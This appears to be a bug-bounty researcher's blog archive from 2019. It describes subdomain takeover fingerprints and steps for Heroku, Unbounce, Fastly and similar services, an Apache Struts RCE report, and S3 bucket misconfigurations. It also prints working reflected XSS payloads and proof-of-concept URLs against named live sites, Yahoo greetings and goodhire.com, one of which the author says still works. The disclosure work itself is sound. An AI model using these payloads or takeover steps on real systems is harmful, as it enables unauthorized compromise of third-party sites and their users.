Jun 11, 2019

Can I takeover XYZ ( Steps )

Can I takeover XYZ ( Steps ) ?

Based on can-i-take-over-xyz

_______________________________________________________________________

Service : HeroKu 
Fingerprint: No Such app

There is two Types of Takeover in this Service 
1) HerokuDNS ( Edgecase
2) HeroKuapp

Steps to Takeover : 
Please note : This takeover Edgecase ( HeroKuDns ) cause dns of this webiste is an Ip address belong to Heroku
 HeroKuapp takeover is the same steps but the dns of the domain or subdomain is example : haronapplication.herokuapp.com so you only will create anew app called haronapplication




_____________________________________________________________________

Service : Wufoo
FingerPrint : Profile Not found.
Steps: 
Subdomain cname will be like 
haronsurvey.wufoo.com
and full steps is here 


__________________________________________________________________________

Service : Unbounce 
Fingerprint: The requested url was not found on this server.

Takeover Steps : 
Still possible for old clients
Steps here 

_____________________________________________________________________________

Service : HubSpot
Fingerprint : Domain Not found.
Takeover Steps :
Possible 
Soon will be added.

info here 

____________________________________________________________________________

Service : Shopify 
FingerPrint : Sorry, this shop is currently unavailable.


Takeover Steps :
here

________________________________________________________________________

Service : Campaign Monitor
FingerPrint : Trying to access your account?

Takeover Steps : 

__________________________________________________________________________

Service : Fastly 
FingerPrint: Fastly error: unknown domain

Takeover Steps: 
Create your Fastly account for free and Do this steps in video




                                           

___________________________________________________________________________





Apr 13, 2019

[ Special Case ] HerkoKuDns is Still vulnerable to Subdomain Takeovers ( Live PoC )




Today I will Share a New Found about 
Subdomain Takeovers
Via HeroKuDNS 
[ Edge Case ]

Many Blogs says You can't takeover from herokudns any more 
because now they use a Random cname generator 

In this blog I will explain How could I takeover this Domain 
And Adding it to my Custom Domains List on my heroku dashboard
-----------------------------------------------
Explain 
Simply 
1) if you see the this pic 
which Show you in Title " No Such App "


2) Now Go to see DNS of the Subdomain 
if you found it like this ( IPS) 

3) You can Add it Directly to your Heroku Account to any App as a Custom domain 
Yes When You add it you will get a Random Cname Like what happen when I added dns-scratch.me to my account 



4)  Domain or Subdomain is now Connected 



---------------------------------------------------------

Apr 12, 2019

[RCE] Remote code execution at api.PrivateProgram.com (CVE-2017-5638)





Apache Struts CVE-2017-5638 
Remote Code Execution Vulnerability
Program : Private on HackerOne
Bounty : 2000$ and 250$ Bouns
Subdomain : Api.Private.com


Today I will Post my new Find 
Remote code execution
in Api Subdomain of Private Program 
which was used a Vulnerable version of Apache Struts
(CVE-2017-5638)

CVE-2017-5638 Describe : 
The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

Poc was : 


References : 





----------------------------------------------------------

Mar 19, 2019

Feb 26, 2019

[Still work] Redirect Yahoo Subdomain XSS Reflected from americangreetings.com






Bug Type : Reflected XSS
Affected Site : americangreetings.com 
Yahoo Subdomain : greetings.yahoo.com


Description 
I've reported this to yahoo and Greeting but was marked as infromative 
so they don't mind to disclose it.

This XSS  still work 

I've found that yahoo subdomain greetings.yahoo.com can be redirect to any path americangreetings.com 

So I tried to get a reflected XSS at americangreetings.com in paths

The XSS was affected this path 
/search-results/{xss payload}

************************************
Suggested fix to yahoo was
to make fix like 
greetings.yahoo.ca
it redirect only to site home only 

***************************************

Poc link : 

http://greetings.yahoo.com/search-results/'"--><Details Open OnToggle=confirm`Haron`>

https://www.americangreetings.com/search-results/'%22--%3e%3cDetails%20Open%20OnToggle=confirm%60Haron%60%3e


*************************************


Feb 22, 2019

AWS s3 Buckets Create





Amazon aws s3 buckets are Simple and Can be created by everyone

************************
Steps to create a S3 bucket 

1) you must create an amazon aws account first ( Required Credit Card ) 
 your payment information so we can verify your identity. They will not charge you unless your usage exceeds the AWS Free Tier Limits.


3) create Bucket is simple here as you see in pic 

2) Enter you Bucket name 
I've choose HaronBucket 
Please remember this will be your bucket link 
exmaple as mine 
haronbucket.s3.amazonaws.com
s3.amazonaws.com/haronbucket


Click Next Then Next if you don't need a special config or permissions



After clicking Create Bucket
Your Bucket will be Shown in Buckets Home


**********************************
Now Upload your files is very easy 
1) go to your buckets home
2) choose your bucket which you want to upload files 
or you can go to this link ( add your bucket )
https://s3.console.aws.amazon.com/s3/buckets/your-bucket/


3) Click on get Start and Choose your files you want to upload :) then click upload

4 ) Your upload file will be shown in your bucket home files click on the file which you upload




5) click on Make Public and scroll down you will see your file link Public


Subdomain Misconfiguration lead to AWS S3 Buckets Reader




Bug Type : Subdomain misconfiguration
Program : Private on HackerOne
Severity : P2 ( High
Bounty : 600$ + 200$ Bouns
Subdomain : images.example.com

************************************
How I found this Bug 
it was simple When I go direct to https://images.example.com I found it redirect to https://aws.amazon.com/s3/

So now I started to found the cname and it was
images.example.com  >  s3.amazon.com

Here was the bug I saw many companies use the same error 
Developers must add a white s3 Buckets list 

So now I can call any bucket on images.example.com

example : images.example.com/haron-bucket/




************************
Steps to find This error very simple
 if the subdomain has this alias s3.amazonaws.com 
Try to add your bucket directly to subdomain 
example : subdomain.site.com/yourbucket/yourfile.html
if it run this is vulnerable if not so this mean developers added a white buckets list

******************************************


Please see this Write Up for create your Bucket 
https://www.mohamedharon.com/2019/02/aws-s3-buckets-create.html




*********************************************************


Feb 18, 2019

2 Subdomains Takeover via Unbounce in a Private Program









Many Researchers asked me about this takeover is still exist or fixed ? 
Yes this takeover still exist with 3 scenarios 
as Akita Zen said 


*****************************
Bug Type : Subdomain Takeover 
Service : Unbounce 
Severity : Critical 
Program : Private on Hackerone
Status : Duplicate after fixing it

*************************
In a Private Program on HackerOne I've found a 2 subdomains
get.example.com
try.example.com
 has an cname  pointing to unbouncepages.com
and show me the takeover error ( Finger print ) 
So I made an account and tried to add the domain to my page on unbounce and it connected Successful 


Steps to takeover 
1) create an account on unbounce with credit card  
2) create your unbounce page 
3) add a domain to your page 
if give you the domain is already taken this mean there is no takeover.
example : info.hacker.one
its show us the takeover finger print but its already worked and added to another account so there is no takeover in it.




Timeline 
Reported : 6 Nov,2018
Traiged : 7 Nov,2018
I notice that they Fixed it : 7 Nov,2018 after 2 hours 
Duplicate : 10 Nov,2018


******************************

Feb 17, 2019

Reflected XSS in GoodHire.com CMS

Reflected XSS in GoodHire.com CMS






Program : inflection
Bug Type : Reflected XSS
Severity : High 
Domain : GoodHire.com
Bounty : 0$ + Bouns 150$

******************************
Affected Parameter was in HubSpot CMS
referrerUrl
Affected Path 
/_hcms/cta

**********************************
Payload
{%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:""//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}


**********************************
Poc was : 
https://www.goodhire.com/_hcms/cta?referrerUrl={%25+macro+field()+%25}moc.okok//:ptth//)niamod.tnemucod(trela:tpircsavaj=daolno+gvshttp://http:%22%22//{%25+endmacro+%25}{{+field(1)%7curlize%7creverse%7curlize%7creverse%7curlize%7creverse+}}


***********************************
More about this Bug please visit my write up 






****************************************